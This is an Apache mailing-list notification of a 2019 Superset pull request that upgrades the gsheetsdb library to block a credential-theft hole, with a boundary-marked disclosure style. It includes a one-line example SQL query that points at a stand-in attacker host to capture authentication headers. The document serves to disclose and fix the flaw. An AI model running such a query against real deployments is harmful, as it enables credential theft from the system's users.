You are viewing a plain text version of this content. The canonical link for it is here.

Posted to notifications@superset.apache.org by GitBox <gi...@apache.org> on 2019/01/08 01:55:22 UTC

[GitHub] betodealmeida opened a new pull request #6609: Upgrade gsheetsdb

betodealmeida opened a new pull request #6609: Upgrade gsheetsdb
URL: https://github.com/apache/incubator-superset/pull/6609
 
 
   The [gshetsdb](https://github.com/betodealmeida/gsheets-db-api) library was upgraded ([0.1.9](https://github.com/betodealmeida/gsheets-db-api/commit/12f2a4fbe1bd5aa36781226759326ce782b08a91)) so that users can connect only to Google Spreadsheets. This prevents users from connecting to a host they control and stealing authentication headers.
   
   For example, in earlier versions users could do:
   
   ```sql
   SELECT * FROM "http://evilhost.example.com/";
   ```
   
   And if they control `evilhost.example.com` they would be able to perform a MITM attack or steal credentials.
   
   cc: @mistercrunch 

----------------------------------------------------------------
This is an automated message from the Apache Git Service.
To respond to the message, please log on GitHub and use the
URL above to go to the specific comment.
 
For queries about this service, please contact Infrastructure at:
users@infra.apache.org


With regards,
Apache Git Services

---------------------------------------------------------------------
To unsubscribe, e-mail: notifications-unsubscribe@superset.apache.org
For additional commands, e-mail: notifications-help@superset.apache.org